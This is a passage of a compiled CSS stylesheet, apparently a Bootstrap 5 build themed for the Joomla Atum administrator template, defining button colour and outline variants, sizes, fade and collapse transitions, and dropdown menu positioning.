  box-shadow: 0 0 0 0.25rem rgba(54, 78, 109, 0.5);
}
.btn-check:checked + .btn-primary, .btn-check:active + .btn-primary, .btn-primary:active, .btn-primary.active, .show > .btn-primary.dropdown-toggle {
  color: #fff;
  background-color: #0f2642;
  border-color: #0e233e;
}
.btn-check:checked + .btn-primary:focus, .btn-check:active + .btn-primary:focus, .btn-primary:active:focus, .btn-primary.active:focus, .show > .btn-primary.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.25rem rgba(54, 78, 109, 0.5);
}
.btn-primary:disabled, .btn-primary.disabled {
  color: #fff;
  background-color: #132f53;
  border-color: #132f53;
}

.btn-secondary {
  color: #fff;
  background-color: #495057;
  border-color: #495057;
}
.btn-secondary:hover {
  color: #fff;
  background-color: #3e444a;
  border-color: #3a4046;
}
.btn-check:focus + .btn-secondary, .btn-secondary:focus {
  color: #fff;
  background-color: #3e444a;
  border-color: #3a4046;
  box-shadow: 0 0 0 0.25rem rgba(100, 106, 112, 0.5);
}
.btn-check:checked + .btn-secondary, .btn-check:active + .btn-secondary, .btn-secondary:active, .btn-secondary.active, .show > .btn-secondary.dropdown-toggle {
  color: #fff;
  background-color: #3a4046;
  border-color: #373c41;
}
.btn-check:checked + .btn-secondary:focus, .btn-check:active + .btn-secondary:focus, .btn-secondary:active:focus, .btn-secondary.active:focus, .show > .btn-secondary.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.25rem rgba(100, 106, 112, 0.5);
}
.btn-secondary:disabled, .btn-secondary.disabled {
  color: #fff;
  background-color: #495057;
  border-color: #495057;
}

.btn-success {
  color: #fff;
  background-color: #457d54;
  border-color: #457d54;
}
.btn-success:hover {
  color: #fff;
  background-color: #3b6a47;
  border-color: #376443;
}
.btn-check:focus + .btn-success, .btn-success:focus {
  color: #fff;
  background-color: #3b6a47;
  border-color: #376443;
  box-shadow: 0 0 0 0.25rem rgba(97, 145, 110, 0.5);
}
.btn-check:checked + .btn-success, .btn-check:active + .btn-success, .btn-success:active, .btn-success.active, .show > .btn-success.dropdown-toggle {
  color: #fff;
  background-color: #376443;
  border-color: #345e3f;
}
.btn-check:checked + .btn-success:focus, .btn-check:active + .btn-success:focus, .btn-success:active:focus, .btn-success.active:focus, .show > .btn-success.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.25rem rgba(97, 145, 110, 0.5);
}
.btn-success:disabled, .btn-success.disabled {
  color: #fff;
  background-color: #457d54;
  border-color: #457d54;
}

.btn-info {
  color: #fff;
  background-color: #2a69b8;
  border-color: #2a69b8;
}
.btn-info:hover {
  color: #fff;
  background-color: #24599c;
  border-color: #225493;
}
.btn-check:focus + .btn-info, .btn-info:focus {
  color: #fff;
  background-color: #24599c;
  border-color: #225493;
  box-shadow: 0 0 0 0.25rem rgba(74, 128, 195, 0.5);
}
.btn-check:checked + .btn-info, .btn-check:active + .btn-info, .btn-info:active, .btn-info.active, .show > .btn-info.dropdown-toggle {
  color: #fff;
  background-color: #225493;
  border-color: #204f8a;
}
.btn-check:checked + .btn-info:focus, .btn-check:active + .btn-info:focus, .btn-info:active:focus, .btn-info.active:focus, .show > .btn-info.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.25rem rgba(74, 128, 195, 0.5);
}
.btn-info:disabled, .btn-info.disabled {
  color: #fff;
  background-color: #2a69b8;
  border-color: #2a69b8;
}

.btn-warning {
  color: #000;
  background-color: #ffb514;
  border-color: #ffb514;
}
.btn-warning:hover {
  color: #000;
  background-color: #ffc037;
  border-color: #ffbc2c;
}
.btn-check:focus + .btn-warning, .btn-warning:focus {
  color: #000;
  background-color: #ffc037;
  border-color: #ffbc2c;
  box-shadow: 0 0 0 0.25rem rgba(217, 154, 17, 0.5);
}
.btn-check:checked + .btn-warning, .btn-check:active + .btn-warning, .btn-warning:active, .btn-warning.active, .show > .btn-warning.dropdown-toggle {
  color: #000;
  background-color: #ffc443;
  border-color: #ffbc2c;
}
.btn-check:checked + .btn-warning:focus, .btn-check:active + .btn-warning:focus, .btn-warning:active:focus, .btn-warning.active:focus, .show > .btn-warning.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.25rem rgba(217, 154, 17, 0.5);
}
.btn-warning:disabled, .btn-warning.disabled {
  color: #000;
  background-color: #ffb514;
  border-color: #ffb514;
}

.btn-danger {
  color: #fff;
  background-color: #c52827;
  border-color: #c52827;
}
.btn-danger:hover {
  color: #fff;
  background-color: #a72221;
  border-color: #9e201f;
}
.btn-check:focus + .btn-danger, .btn-danger:focus {
  color: #fff;
  background-color: #a72221;
  border-color: #9e201f;
  box-shadow: 0 0 0 0.25rem rgba(206, 72, 71, 0.5);
}
.btn-check:checked + .btn-danger, .btn-check:active + .btn-danger, .btn-danger:active, .btn-danger.active, .show > .btn-danger.dropdown-toggle {
  color: #fff;
  background-color: #9e201f;
  border-color: #941e1d;
}
.btn-check:checked + .btn-danger:focus, .btn-check:active + .btn-danger:focus, .btn-danger:active:focus, .btn-danger.active:focus, .show > .btn-danger.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.25rem rgba(206, 72, 71, 0.5);
}
.btn-danger:disabled, .btn-danger.disabled {
  color: #fff;
  background-color: #c52827;
  border-color: #c52827;
}

.btn-light {
  color: #000;
  background-color: #f8f9fa;
  border-color: #f8f9fa;
}
.btn-light:hover {
  color: #000;
  background-color: #f9fafb;
  border-color: #f9fafb;
}
.btn-check:focus + .btn-light, .btn-light:focus {
  color: #000;
  background-color: #f9fafb;
  border-color: #f9fafb;
  box-shadow: 0 0 0 0.25rem rgba(211, 212, 213, 0.5);
}
.btn-check:checked + .btn-light, .btn-check:active + .btn-light, .btn-light:active, .btn-light.active, .show > .btn-light.dropdown-toggle {
  color: #000;
  background-color: #f9fafb;
  border-color: #f9fafb;
}
.btn-check:checked + .btn-light:focus, .btn-check:active + .btn-light:focus, .btn-light:active:focus, .btn-light.active:focus, .show > .btn-light.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.25rem rgba(211, 212, 213, 0.5);
}
.btn-light:disabled, .btn-light.disabled {
  color: #000;
  background-color: #f8f9fa;
  border-color: #f8f9fa;
}

.btn-dark {
  color: #fff;
  background-color: #212529;
  border-color: #212529;
}
.btn-dark:hover {
  color: #fff;
  background-color: #1c1f23;
  border-color: #1a1e21;
}
.btn-check:focus + .btn-dark, .btn-dark:focus {
  color: #fff;
  background-color: #1c1f23;
  border-color: #1a1e21;
  box-shadow: 0 0 0 0.25rem rgba(66, 70, 73, 0.5);
}
.btn-check:checked + .btn-dark, .btn-check:active + .btn-dark, .btn-dark:active, .btn-dark.active, .show > .btn-dark.dropdown-toggle {
  color: #fff;
  background-color: #1a1e21;
  border-color: #191c1f;
}
.btn-check:checked + .btn-dark:focus, .btn-check:active + .btn-dark:focus, .btn-dark:active:focus, .btn-dark.active:focus, .show > .btn-dark.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.25rem rgba(66, 70, 73, 0.5);
}
.btn-dark:disabled, .btn-dark.disabled {
  color: #fff;
  background-color: #212529;
  border-color: #212529;
}

.btn-atum-link-color {
  color: #fff;
  background-color: #2a69b8;
  border-color: #2a69b8;
}
.btn-atum-link-color:hover {
  color: #fff;
  background-color: #24599c;
  border-color: #225493;
}
.btn-check:focus + .btn-atum-link-color, .btn-atum-link-color:focus {
  color: #fff;
  background-color: #24599c;
  border-color: #225493;
  box-shadow: 0 0 0 0.25rem rgba(74, 128, 195, 0.5);
}
.btn-check:checked + .btn-atum-link-color, .btn-check:active + .btn-atum-link-color, .btn-atum-link-color:active, .btn-atum-link-color.active, .show > .btn-atum-link-color.dropdown-toggle {
  color: #fff;
  background-color: #225493;
  border-color: #204f8a;
}
.btn-check:checked + .btn-atum-link-color:focus, .btn-check:active + .btn-atum-link-color:focus, .btn-atum-link-color:active:focus, .btn-atum-link-color.active:focus, .show > .btn-atum-link-color.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.25rem rgba(74, 128, 195, 0.5);
}
.btn-atum-link-color:disabled, .btn-atum-link-color.disabled {
  color: #fff;
  background-color: #2a69b8;
  border-color: #2a69b8;
}

.btn-atum-text-dark {
  color: #fff;
  background-color: #495057;
  border-color: #495057;
}
.btn-atum-text-dark:hover {
  color: #fff;
  background-color: #3e444a;
  border-color: #3a4046;
}
.btn-check:focus + .btn-atum-text-dark, .btn-atum-text-dark:focus {
  color: #fff;
  background-color: #3e444a;
  border-color: #3a4046;
  box-shadow: 0 0 0 0.25rem rgba(100, 106, 112, 0.5);
}
.btn-check:checked + .btn-atum-text-dark, .btn-check:active + .btn-atum-text-dark, .btn-atum-text-dark:active, .btn-atum-text-dark.active, .show > .btn-atum-text-dark.dropdown-toggle {
  color: #fff;
  background-color: #3a4046;
  border-color: #373c41;
}
.btn-check:checked + .btn-atum-text-dark:focus, .btn-check:active + .btn-atum-text-dark:focus, .btn-atum-text-dark:active:focus, .btn-atum-text-dark.active:focus, .show > .btn-atum-text-dark.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.25rem rgba(100, 106, 112, 0.5);
}
.btn-atum-text-dark:disabled, .btn-atum-text-dark.disabled {
  color: #fff;
  background-color: #495057;
  border-color: #495057;
}

.btn-action {
  color: #fff;
  background-color: #132f53;
  border-color: #132f53;
}
.btn-action:hover {
  color: #fff;
  background-color: #102847;
  border-color: #0f2642;
}
.btn-check:focus + .btn-action, .btn-action:focus {
  color: #fff;
  background-color: #102847;
  border-color: #0f2642;
  box-shadow: 0 0 0 0.25rem rgba(54, 78, 109, 0.5);
}
.btn-check:checked + .btn-action, .btn-check:active + .btn-action, .btn-action:active, .btn-action.active, .show > .btn-action.dropdown-toggle {
  color: #fff;
  background-color: #0f2642;
  border-color: #0e233e;
}
.btn-check:checked + .btn-action:focus, .btn-check:active + .btn-action:focus, .btn-action:active:focus, .btn-action.active:focus, .show > .btn-action.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.25rem rgba(54, 78, 109, 0.5);
}
.btn-action:disabled, .btn-action.disabled {
  color: #fff;
  background-color: #132f53;
  border-color: #132f53;
}

.btn-error {
  color: #fff;
  background-color: #3b0d0c;
  border-color: #3b0d0c;
}
.btn-error:hover {
  color: #fff;
  background-color: #320b0a;
  border-color: #2f0a0a;
}
.btn-check:focus + .btn-error, .btn-error:focus {
  color: #fff;
  background-color: #320b0a;
  border-color: #2f0a0a;
  box-shadow: 0 0 0 0.25rem rgba(88, 49, 48, 0.5);
}
.btn-check:checked + .btn-error, .btn-check:active + .btn-error, .btn-error:active, .btn-error.active, .show > .btn-error.dropdown-toggle {
  color: #fff;
  background-color: #2f0a0a;
  border-color: #2c0a09;
}
.btn-check:checked + .btn-error:focus, .btn-check:active + .btn-error:focus, .btn-error:active:focus, .btn-error.active:focus, .show > .btn-error.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.25rem rgba(88, 49, 48, 0.5);
}
.btn-error:disabled, .btn-error.disabled {
  color: #fff;
  background-color: #3b0d0c;
  border-color: #3b0d0c;
}

.btn-alert-success {
  color: #fff;
  background-color: #0f2f21;
  border-color: #0f2f21;
}
.btn-alert-success:hover {
  color: #fff;
  background-color: #0d281c;
  border-color: #0c261a;
}
.btn-check:focus + .btn-alert-success, .btn-alert-success:focus {
  color: #fff;
  background-color: #0d281c;
  border-color: #0c261a;
  box-shadow: 0 0 0 0.25rem rgba(51, 78, 66, 0.5);
}
.btn-check:checked + .btn-alert-success, .btn-check:active + .btn-alert-success, .btn-alert-success:active, .btn-alert-success.active, .show > .btn-alert-success.dropdown-toggle {
  color: #fff;
  background-color: #0c261a;
  border-color: #0b2319;
}
.btn-check:checked + .btn-alert-success:focus, .btn-check:active + .btn-alert-success:focus, .btn-alert-success:active:focus, .btn-alert-success.active:focus, .show > .btn-alert-success.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.25rem rgba(51, 78, 66, 0.5);
}
.btn-alert-success:disabled, .btn-alert-success.disabled {
  color: #fff;
  background-color: #0f2f21;
  border-color: #0f2f21;
}

.btn-outline-primary {
  color: #132f53;
  border-color: #132f53;
}
.btn-outline-primary:hover {
  color: #fff;
  background-color: #132f53;
  border-color: #132f53;
}
.btn-check:focus + .btn-outline-primary, .btn-outline-primary:focus {
  box-shadow: 0 0 0 0.25rem rgba(19, 47, 83, 0.5);
}
.btn-check:checked + .btn-outline-primary, .btn-check:active + .btn-outline-primary, .btn-outline-primary:active, .btn-outline-primary.active, .btn-outline-primary.dropdown-toggle.show {
  color: #fff;
  background-color: #132f53;
  border-color: #132f53;
}
.btn-check:checked + .btn-outline-primary:focus, .btn-check:active + .btn-outline-primary:focus, .btn-outline-primary:active:focus, .btn-outline-primary.active:focus, .btn-outline-primary.dropdown-toggle.show:focus {
  box-shadow: 0 0 0 0.25rem rgba(19, 47, 83, 0.5);
}
.btn-outline-primary:disabled, .btn-outline-primary.disabled {
  color: #132f53;
  background-color: transparent;
}

.btn-outline-secondary {
  color: #495057;
  border-color: #495057;
}
.btn-outline-secondary:hover {
  color: #fff;
  background-color: #495057;
  border-color: #495057;
}
.btn-check:focus + .btn-outline-secondary, .btn-outline-secondary:focus {
  box-shadow: 0 0 0 0.25rem rgba(73, 80, 87, 0.5);
}
.btn-check:checked + .btn-outline-secondary, .btn-check:active + .btn-outline-secondary, .btn-outline-secondary:active, .btn-outline-secondary.active, .btn-outline-secondary.dropdown-toggle.show {
  color: #fff;
  background-color: #495057;
  border-color: #495057;
}
.btn-check:checked + .btn-outline-secondary:focus, .btn-check:active + .btn-outline-secondary:focus, .btn-outline-secondary:active:focus, .btn-outline-secondary.active:focus, .btn-outline-secondary.dropdown-toggle.show:focus {
  box-shadow: 0 0 0 0.25rem rgba(73, 80, 87, 0.5);
}
.btn-outline-secondary:disabled, .btn-outline-secondary.disabled {
  color: #495057;
  background-color: transparent;
}

.btn-outline-success {
  color: #457d54;
  border-color: #457d54;
}
.btn-outline-success:hover {
  color: #fff;
  background-color: #457d54;
  border-color: #457d54;
}
.btn-check:focus + .btn-outline-success, .btn-outline-success:focus {
  box-shadow: 0 0 0 0.25rem rgba(69, 125, 84, 0.5);
}
.btn-check:checked + .btn-outline-success, .btn-check:active + .btn-outline-success, .btn-outline-success:active, .btn-outline-success.active, .btn-outline-success.dropdown-toggle.show {
  color: #fff;
  background-color: #457d54;
  border-color: #457d54;
}
.btn-check:checked + .btn-outline-success:focus, .btn-check:active + .btn-outline-success:focus, .btn-outline-success:active:focus, .btn-outline-success.active:focus, .btn-outline-success.dropdown-toggle.show:focus {
  box-shadow: 0 0 0 0.25rem rgba(69, 125, 84, 0.5);
}
.btn-outline-success:disabled, .btn-outline-success.disabled {
  color: #457d54;
  background-color: transparent;
}

.btn-outline-info {
  color: #2a69b8;
  border-color: #2a69b8;
}
.btn-outline-info:hover {
  color: #fff;
  background-color: #2a69b8;
  border-color: #2a69b8;
}
.btn-check:focus + .btn-outline-info, .btn-outline-info:focus {
  box-shadow: 0 0 0 0.25rem rgba(42, 105, 184, 0.5);
}
.btn-check:checked + .btn-outline-info, .btn-check:active + .btn-outline-info, .btn-outline-info:active, .btn-outline-info.active, .btn-outline-info.dropdown-toggle.show {
  color: #fff;
  background-color: #2a69b8;
  border-color: #2a69b8;
}
.btn-check:checked + .btn-outline-info:focus, .btn-check:active + .btn-outline-info:focus, .btn-outline-info:active:focus, .btn-outline-info.active:focus, .btn-outline-info.dropdown-toggle.show:focus {
  box-shadow: 0 0 0 0.25rem rgba(42, 105, 184, 0.5);
}
.btn-outline-info:disabled, .btn-outline-info.disabled {
  color: #2a69b8;
  background-color: transparent;
}

.btn-outline-warning {
  color: #ffb514;
  border-color: #ffb514;
}
.btn-outline-warning:hover {
  color: #000;
  background-color: #ffb514;
  border-color: #ffb514;
}
.btn-check:focus + .btn-outline-warning, .btn-outline-warning:focus {
  box-shadow: 0 0 0 0.25rem rgba(255, 181, 20, 0.5);
}
.btn-check:checked + .btn-outline-warning, .btn-check:active + .btn-outline-warning, .btn-outline-warning:active, .btn-outline-warning.active, .btn-outline-warning.dropdown-toggle.show {
  color: #000;
  background-color: #ffb514;
  border-color: #ffb514;
}
.btn-check:checked + .btn-outline-warning:focus, .btn-check:active + .btn-outline-warning:focus, .btn-outline-warning:active:focus, .btn-outline-warning.active:focus, .btn-outline-warning.dropdown-toggle.show:focus {
  box-shadow: 0 0 0 0.25rem rgba(255, 181, 20, 0.5);
}
.btn-outline-warning:disabled, .btn-outline-warning.disabled {
  color: #ffb514;
  background-color: transparent;
}

.btn-outline-danger {
  color: #c52827;
  border-color: #c52827;
}
.btn-outline-danger:hover {
  color: #fff;
  background-color: #c52827;
  border-color: #c52827;
}
.btn-check:focus + .btn-outline-danger, .btn-outline-danger:focus {
  box-shadow: 0 0 0 0.25rem rgba(197, 40, 39, 0.5);
}
.btn-check:checked + .btn-outline-danger, .btn-check:active + .btn-outline-danger, .btn-outline-danger:active, .btn-outline-danger.active, .btn-outline-danger.dropdown-toggle.show {
  color: #fff;
  background-color: #c52827;
  border-color: #c52827;
}
.btn-check:checked + .btn-outline-danger:focus, .btn-check:active + .btn-outline-danger:focus, .btn-outline-danger:active:focus, .btn-outline-danger.active:focus, .btn-outline-danger.dropdown-toggle.show:focus {
  box-shadow: 0 0 0 0.25rem rgba(197, 40, 39, 0.5);
}
.btn-outline-danger:disabled, .btn-outline-danger.disabled {
  color: #c52827;
  background-color: transparent;
}

.btn-outline-light {
  color: #f8f9fa;
  border-color: #f8f9fa;
}
.btn-outline-light:hover {
  color: #000;
  background-color: #f8f9fa;
  border-color: #f8f9fa;
}
.btn-check:focus + .btn-outline-light, .btn-outline-light:focus {
  box-shadow: 0 0 0 0.25rem rgba(248, 249, 250, 0.5);
}
.btn-check:checked + .btn-outline-light, .btn-check:active + .btn-outline-light, .btn-outline-light:active, .btn-outline-light.active, .btn-outline-light.dropdown-toggle.show {
  color: #000;
  background-color: #f8f9fa;
  border-color: #f8f9fa;
}
.btn-check:checked + .btn-outline-light:focus, .btn-check:active + .btn-outline-light:focus, .btn-outline-light:active:focus, .btn-outline-light.active:focus, .btn-outline-light.dropdown-toggle.show:focus {
  box-shadow: 0 0 0 0.25rem rgba(248, 249, 250, 0.5);
}
.btn-outline-light:disabled, .btn-outline-light.disabled {
  color: #f8f9fa;
  background-color: transparent;
}

.btn-outline-dark {
  color: #212529;
  border-color: #212529;
}
.btn-outline-dark:hover {
  color: #fff;
  background-color: #212529;
  border-color: #212529;
}
.btn-check:focus + .btn-outline-dark, .btn-outline-dark:focus {
  box-shadow: 0 0 0 0.25rem rgba(33, 37, 41, 0.5);
}
.btn-check:checked + .btn-outline-dark, .btn-check:active + .btn-outline-dark, .btn-outline-dark:active, .btn-outline-dark.active, .btn-outline-dark.dropdown-toggle.show {
  color: #fff;
  background-color: #212529;
  border-color: #212529;
}
.btn-check:checked + .btn-outline-dark:focus, .btn-check:active + .btn-outline-dark:focus, .btn-outline-dark:active:focus, .btn-outline-dark.active:focus, .btn-outline-dark.dropdown-toggle.show:focus {
  box-shadow: 0 0 0 0.25rem rgba(33, 37, 41, 0.5);
}
.btn-outline-dark:disabled, .btn-outline-dark.disabled {
  color: #212529;
  background-color: transparent;
}

.btn-outline-atum-link-color {
  color: #2a69b8;
  border-color: #2a69b8;
}
.btn-outline-atum-link-color:hover {
  color: #fff;
  background-color: #2a69b8;
  border-color: #2a69b8;
}
.btn-check:focus + .btn-outline-atum-link-color, .btn-outline-atum-link-color:focus {
  box-shadow: 0 0 0 0.25rem rgba(42, 105, 184, 0.5);
}
.btn-check:checked + .btn-outline-atum-link-color, .btn-check:active + .btn-outline-atum-link-color, .btn-outline-atum-link-color:active, .btn-outline-atum-link-color.active, .btn-outline-atum-link-color.dropdown-toggle.show {
  color: #fff;
  background-color: #2a69b8;
  border-color: #2a69b8;
}
.btn-check:checked + .btn-outline-atum-link-color:focus, .btn-check:active + .btn-outline-atum-link-color:focus, .btn-outline-atum-link-color:active:focus, .btn-outline-atum-link-color.active:focus, .btn-outline-atum-link-color.dropdown-toggle.show:focus {
  box-shadow: 0 0 0 0.25rem rgba(42, 105, 184, 0.5);
}
.btn-outline-atum-link-color:disabled, .btn-outline-atum-link-color.disabled {
  color: #2a69b8;
  background-color: transparent;
}

.btn-outline-atum-text-dark {
  color: #495057;
  border-color: #495057;
}
.btn-outline-atum-text-dark:hover {
  color: #fff;
  background-color: #495057;
  border-color: #495057;
}
.btn-check:focus + .btn-outline-atum-text-dark, .btn-outline-atum-text-dark:focus {
  box-shadow: 0 0 0 0.25rem rgba(73, 80, 87, 0.5);
}
.btn-check:checked + .btn-outline-atum-text-dark, .btn-check:active + .btn-outline-atum-text-dark, .btn-outline-atum-text-dark:active, .btn-outline-atum-text-dark.active, .btn-outline-atum-text-dark.dropdown-toggle.show {
  color: #fff;
  background-color: #495057;
  border-color: #495057;
}
.btn-check:checked + .btn-outline-atum-text-dark:focus, .btn-check:active + .btn-outline-atum-text-dark:focus, .btn-outline-atum-text-dark:active:focus, .btn-outline-atum-text-dark.active:focus, .btn-outline-atum-text-dark.dropdown-toggle.show:focus {
  box-shadow: 0 0 0 0.25rem rgba(73, 80, 87, 0.5);
}
.btn-outline-atum-text-dark:disabled, .btn-outline-atum-text-dark.disabled {
  color: #495057;
  background-color: transparent;
}

.btn-outline-action {
  color: #132f53;
  border-color: #132f53;
}
.btn-outline-action:hover {
  color: #fff;
  background-color: #132f53;
  border-color: #132f53;
}
.btn-check:focus + .btn-outline-action, .btn-outline-action:focus {
  box-shadow: 0 0 0 0.25rem rgba(19, 47, 83, 0.5);
}
.btn-check:checked + .btn-outline-action, .btn-check:active + .btn-outline-action, .btn-outline-action:active, .btn-outline-action.active, .btn-outline-action.dropdown-toggle.show {
  color: #fff;
  background-color: #132f53;
  border-color: #132f53;
}
.btn-check:checked + .btn-outline-action:focus, .btn-check:active + .btn-outline-action:focus, .btn-outline-action:active:focus, .btn-outline-action.active:focus, .btn-outline-action.dropdown-toggle.show:focus {
  box-shadow: 0 0 0 0.25rem rgba(19, 47, 83, 0.5);
}
.btn-outline-action:disabled, .btn-outline-action.disabled {
  color: #132f53;
  background-color: transparent;
}

.btn-outline-error {
  color: #3b0d0c;
  border-color: #3b0d0c;
}
.btn-outline-error:hover {
  color: #fff;
  background-color: #3b0d0c;
  border-color: #3b0d0c;
}
.btn-check:focus + .btn-outline-error, .btn-outline-error:focus {
  box-shadow: 0 0 0 0.25rem rgba(59, 13, 12, 0.5);
}
.btn-check:checked + .btn-outline-error, .btn-check:active + .btn-outline-error, .btn-outline-error:active, .btn-outline-error.active, .btn-outline-error.dropdown-toggle.show {
  color: #fff;
  background-color: #3b0d0c;
  border-color: #3b0d0c;
}
.btn-check:checked + .btn-outline-error:focus, .btn-check:active + .btn-outline-error:focus, .btn-outline-error:active:focus, .btn-outline-error.active:focus, .btn-outline-error.dropdown-toggle.show:focus {
  box-shadow: 0 0 0 0.25rem rgba(59, 13, 12, 0.5);
}
.btn-outline-error:disabled, .btn-outline-error.disabled {
  color: #3b0d0c;
  background-color: transparent;
}

.btn-outline-alert-success {
  color: #0f2f21;
  border-color: #0f2f21;
}
.btn-outline-alert-success:hover {
  color: #fff;
  background-color: #0f2f21;
  border-color: #0f2f21;
}
.btn-check:focus + .btn-outline-alert-success, .btn-outline-alert-success:focus {
  box-shadow: 0 0 0 0.25rem rgba(15, 47, 33, 0.5);
}
.btn-check:checked + .btn-outline-alert-success, .btn-check:active + .btn-outline-alert-success, .btn-outline-alert-success:active, .btn-outline-alert-success.active, .btn-outline-alert-success.dropdown-toggle.show {
  color: #fff;
  background-color: #0f2f21;
  border-color: #0f2f21;
}
.btn-check:checked + .btn-outline-alert-success:focus, .btn-check:active + .btn-outline-alert-success:focus, .btn-outline-alert-success:active:focus, .btn-outline-alert-success.active:focus, .btn-outline-alert-success.dropdown-toggle.show:focus {
  box-shadow: 0 0 0 0.25rem rgba(15, 47, 33, 0.5);
}
.btn-outline-alert-success:disabled, .btn-outline-alert-success.disabled {
  color: #0f2f21;
  background-color: transparent;
}

.btn-link {
  font-weight: 400;
  color: var(--template-link-color);
  text-decoration: none;
}
.btn-link:hover {
  color: var(--template-link-hover-color);
}
.btn-link:disabled, .btn-link.disabled {
  color: #666e76;
}

.btn-lg, .btn-group-lg > .btn {
  padding: 0.5rem 1rem;
  font-size: 1.25rem;
  border-radius: 0.3rem;
}

.btn-sm, .btn-group-sm > .btn {
  padding: 0.25rem 0.5rem;
  font-size: 0.8rem;
  border-radius: 0.2rem;
}

.fade {
  transition: opacity 0.15s linear;
}
@media (prefers-reduced-motion: reduce) {
  .fade {
    transition: none;
  }
}
.fade:not(.show) {
  opacity: 0;
}

.collapse:not(.show) {
  display: none;
}

.collapsing {
  height: 0;
  overflow: hidden;
  transition: height 0.35s ease;
}
@media (prefers-reduced-motion: reduce) {
  .collapsing {
    transition: none;
  }
}

.dropup,
.dropend,
.dropdown,
.dropstart {
  position: relative;
}

.dropdown-toggle {
  white-space: nowrap;
}
.dropdown-toggle::after {
  display: inline-block;
  margin-left: 0.255em;
  vertical-align: 0.255em;
  content: "";
  border-top: 0.3em solid;
  border-right: 0.3em solid transparent;
  border-bottom: 0;
  border-left: 0.3em solid transparent;
}
.dropdown-toggle:empty::after {
  margin-left: 0;
}

.dropdown-menu {
  position: absolute;
  z-index: 1000;
  display: none;
  min-width: 10rem;
  padding: 0 0;
  margin: 0;
  font-size: 1rem;
  color: var(--template-text-dark);
  text-align: left;
  list-style: none;
  background-color: #fff;
  background-clip: padding-box;
  border: 1px solid rgba(0, 0, 0, 0.15);
  border-radius: 0.25rem;
}
.dropdown-menu[data-bs-popper] {
  top: 100%;
  left: 0;
  margin-top: 0;
}

.dropdown-menu-start {
  --bs-position: start;
}
.dropdown-menu-start[data-bs-popper] {
  right: auto;
  left: 0;
}

.dropdown-menu-end {
  --bs-position: end;
}
.dropdown-menu-end[data-bs-popper] {
  right: 0;
  left: auto;
}

@media (min-width: 576px) {
  .dropdown-menu-sm-start {
    --bs-position: start;
  }
  .dropdown-menu-sm-start[data-bs-popper] {
    right: auto;
    left: 0;
  }

  .dropdown-menu-sm-end {
    --bs-position: end;
  }
  .dropdown-menu-sm-end[data-bs-popper] {
    right: 0;
    left: auto;
  }
}
@media (min-width: 768px) {
  .dropdown-menu-md-start {
    --bs-position: start;
  }
  .dropdown-menu-md-start[data-bs-popper] {
    right: auto;
    left: 0;
  }

  .dropdown-menu-md-end {
    --bs-position: end;
  }
  .dropdown-menu-md-end[data-bs-popper] {
    right: 0;
    left: auto;
  }
}
@media (min-width: 992px) {
  .dropdown-menu-lg-start {
    --bs-position: start;
  }
  .dropdown-menu-lg-start[data-bs-popper] {
    right: auto;
    left: 0;
  }

  .dropdown-menu-lg-end {
    --bs-position: end;
  }
  .dropdown-menu-lg-end[data-bs-popper] {
    right: 0;
    left: auto;
  }
}
@media (min-width: 1200px) {
  .dropdown-menu-xl-start {
    --bs-position: start;
  }
  .dropdown-menu-xl-start[data-bs-popper] {
    right: auto;
    left: 0;
  }

  .dropdown-menu-xl-end {
    --bs-position: end;
  }
  .dropdown-menu-xl-end[data-bs-popper] {
    right: 0;
    left: auto;
  }
}
@media (min-width: 1400px) {
  .dropdown-menu-xxl-start {
    --bs-position: start;
  }
  .dropdown-menu-xxl-start[data-bs-popper] {
    right: auto;
    left: 0;
  }

  .dropdown-menu-xxl-end {
    --bs-position: end;
  }
  .dropdown-menu-xxl-end[data-bs-popper] {
    right: 0;
    left: auto;
  }
}
.dropup .dropdown-menu[data-bs-popper] {
  top: auto;
  bottom: 100%;
  margin-top: 0;
  margin-bottom: 0;
}
.dropup .dropdown-toggle::after {
  display: inline-block;
  margin-left: 0.255em;
  vertical-align: 0.255em;
  content: "";
  border-top: 0;
  border-right: 0.3em solid transparent;
  border-bottom: 0.3em solid;
  border-left: 0.3em solid transparent;
}
.dropup .dropdown-toggle:empty::after {
  margin-left: 0;
}

.dropend .dropdown-menu[data-bs-popper] {
  top: 0;
  right: auto;
  left: 100%;
  margin-top: 0;
  margin-left: 0;
}
.dropend .dropdown-toggle::after {
  display: inline-block;
  margin-left: 0.255em;
  vertical-align: 0.255em;
  content: "";
  border-top: 0.3em solid transparent;
  border-right: 0;
  border-bottom: 0.3em solid transparent;
  border-left: 0.3em solid;
}
.dropend .dropdown-toggle:empty::after {
  margin-left: 0;
}
.dropend .dropdown-toggle::after {
  vertical-align: 0;
}

.dropstart .dropdown-menu[data-bs-popper] {
  top: 0;
  right: 100%;
  left: auto;
  margin-top: 0;
  margin-right: 0;
}
.dropstart .dropdown-toggle::after {
  display: inline-block;
  margin-left: 0.255em;
  vertical-align: 0.255em;
  content: "";
}
.dropstart .dropdown-toggle::after {
  display: none;
}
.dropstart .dropdown-toggle::before {
  display: inline-block;
  margin-right: 0.255em;
  vertical-align: 0.255em;
  content: "";
  border-top: 0.3em solid transparent;
  border-right: 0.3em solid;
  border-bottom: 0.3em solid transparent;
}
.dropstart .dropdown-toggle:empty::after {
  margin-left: 0;
}
.dropstart .dropdown-toggle::before {
  vertical-align: 0;
}

.dropdown-divider {
  height: 0;
  margin: 0.5rem 0;
  overflow: hidden;
  border-top: 1px solid rgba(0, 0, 0, 0.15);
}

.dropdown-item {
  display: block;
  width: 100%;
  padding: 0.5rem 0.75rem;
  clear: both;
  font-weight: 400;
  color: #212529;
  text-align: inherit;
  white-space: nowrap;
  background-color: transparent;
  border: 0;
}
.dropdown-item:first-child {
  border-top-left-radius: calc(0.25rem - 1px);
  border-top-right-radius: calc(0.25rem - 1px);
}
.dropdown-item:last-child {
  border-bottom-right-radius: calc(0.25rem - 1px);
  border-bottom-left-radius: calc(0.25rem - 1px);
}
.dropdown-item:hover, .dropdown-item:focus {
  color: var(--template-text-dark);
  background-color: #e8e8e8;
}
